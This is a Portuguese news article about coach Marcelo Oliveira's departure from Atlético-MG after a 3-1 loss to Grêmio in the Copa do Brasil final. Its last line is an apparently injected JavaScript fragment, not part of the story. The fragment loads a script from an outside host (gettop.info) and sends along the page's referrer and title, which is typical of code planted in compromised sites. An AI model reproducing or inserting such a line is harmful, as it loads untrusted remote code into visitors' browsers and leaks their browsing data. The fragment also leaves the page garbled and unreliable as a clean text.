O técnico Marcelo Oliveira não é mais treinador do Atlético-MG. A derrota para o Grêmio, na noite de quarta-feira, por 3 x 1, no Mineirão, na primeira partida das finais da Copa do Brasil, foi à gota d’água para o clube definir o futuro do treinador.
O trabalho do técnico vinha desagradando a diretoria atleticana há algum tempo. Embora tenha levado o time às finais da Copa do Brasil e à quarta colocação no Campeonato Brasileiro, o futebol apresentado é pior do que o esperado, sobretudo por conta do bom e caro elenco montado pelo Galo. Pela insatisfação, existia a expectativa de Marcelo não seguir à frente da equipe mesmo com o título da competição.
Marcelo participou de 41 jogos, mas não conseguiu dar padrão de jogo ao Atlético e aproveitar as peças – problemas parecidos ao que viveu no Palmeiras em 2015, quando foi campeão da Copa do Brasil. Em Belo Horizonte, porém, o comandante passou por problemas graves de contusões ou jogadores convocados para as seleções. Em algumas partidas perdeu mais de um time, sendo vários titulares.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;